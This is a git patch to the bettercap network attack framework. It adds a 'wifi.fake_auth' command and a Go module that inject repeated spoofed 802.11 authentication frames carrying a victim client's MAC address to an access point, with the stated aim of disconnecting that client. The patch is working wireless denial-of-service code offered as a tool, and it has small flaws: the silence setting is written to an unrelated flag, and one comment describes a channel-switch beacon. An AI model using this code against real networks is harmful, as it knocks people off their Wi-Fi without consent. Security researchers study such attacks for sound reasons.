From 6bfe8a91a1d690f77fa7cda34ebd17d2d59710b5 Mon Sep 17 00:00:00 2001 From: ydx Date: Tue, 16 Jun 2020 12:05:51 +0800 Subject: [PATCH] add fake auth attack --- modules/wifi/wifi.go | 27 ++++++++++++ modules/wifi/wifi_fake_auth.go | 75 ++++++++++++++++++++++++++++++++++ 2 files changed, 102 insertions(+) create mode 100644 modules/wifi/wifi_fake_auth.go diff --git a/modules/wifi/wifi.go b/modules/wifi/wifi.go index acfcc61f..c9da78e0 100644 --- a/modules/wifi/wifi.go +++ b/modules/wifi/wifi.go @@ -53,6 +53,7 @@ type WiFiModule struct { assocSilent bool assocOpen bool csaSilent bool + fakeAuthSilent bool filterProbeSTA *regexp.Regexp filterProbeAP *regexp.Regexp apRunning bool @@ -85,6 +86,7 @@ func NewWiFiModule(s *session.Session) *WiFiModule { assocSilent: false, assocOpen: false, csaSilent: false, + fakeAuthSilent: false, showManuf: false, shakesAggregate: true, writes: &sync.WaitGroup{}, @@ -220,10 +222,35 @@ func NewWiFiModule(s *session.Session) *WiFiModule { mod.AddHandler(switch_channel_announce) + + fake_auth := session.NewModuleHandler("wifi.fake_auth bssid client", `wifi\.fake_auth ((?:[a-fA-F0-9:]{11,}))\s+((?:[a-fA-F0-9:]{11,}))`, + "send an fake authentication with client mac to ap lead to client disconnect", + func(args []string) error { + bssid, err := net.ParseMAC(args[0]) + if err != nil { + return err + } + + client,err:=net.ParseMAC(args[1]) + if err!=nil{ + return err + } + return mod.startFakeAuth(bssid,client) + }) + + fake_auth.Complete("wifi.fake_auth", s.WiFiCompleterFull) + + mod.AddHandler(fake_auth) + + mod.AddParam(session.NewBoolParameter("wifi.channel_switch_announce.silent", "false", "If true, messages from wifi.channel_switch_announce will be suppressed.")) + mod.AddParam(session.NewBoolParameter("wifi.fake_auth.silent", + "false", + "If true, messages from wifi.fake_auth will be suppressed.")) + mod.AddParam(session.NewStringParameter("wifi.deauth.skip", "", "", diff --git a/modules/wifi/wifi_fake_auth.go b/modules/wifi/wifi_fake_auth.go new file mode 100644 index 00000000..22ef8c09 --- /dev/null +++ b/modules/wifi/wifi_fake_auth.go @@ -0,0 +1,75 @@ +package wifi + +import ( + "bytes" + "fmt" + "github.com/bettercap/bettercap/network" + "github.com/bettercap/bettercap/packets" + "net" +) + + +func (mod *WiFiModule) isFakeAuthSilent() bool { + if err, is := mod.BoolParam("wifi.fake_auth.silent"); err != nil { + mod.Warning("%v", err) + } else { + mod.csaSilent = is + } + return mod.csaSilent +} + + +func(mod *WiFiModule)sendFakeAuthPacket(ap *network.AccessPoint,bssid,client net.HardwareAddr){ + err,pkt:=packets.NewDot11Auth(client,bssid,0) + if err!=nil{ + mod.Error("could not create authentication packet: %s", err) + return + } + for i:=0;i<20;i++{ + mod.injectPacket(pkt) + } +} + +func (mod *WiFiModule) startFakeAuth(bssid,client net.HardwareAddr) error { + // if not already running, temporarily enable the pcap handle + // for packet injection + if !mod.Running() { + if err := mod.Configure(); err != nil { + return err + } + defer mod.handle.Close() + } + + var ap *network.AccessPoint = nil + + for _, _ap := range mod.Session.WiFi.List() { + if bytes.Equal(_ap.HW, bssid) { + ap = _ap + } + + } + + if ap == nil { + return fmt.Errorf("%s is an unknown BSSID", bssid.String()) + } + + mod.writes.Add(1) + go func() { + defer mod.writes.Done() + + if mod.Running() { + logger := mod.Info + if mod.isFakeAuthSilent() { + logger = mod.Debug + } + logger("fake authentication attack in AP: %s client: %s", ap.ESSID(), client.String()) + // send the beacon frame with channel switch announce element id + mod.onChannel(ap.Channel, func() { + mod.sendFakeAuthPacket(ap, bssid,client) + }) + } + + }() + + return nil +} \ No newline at end of file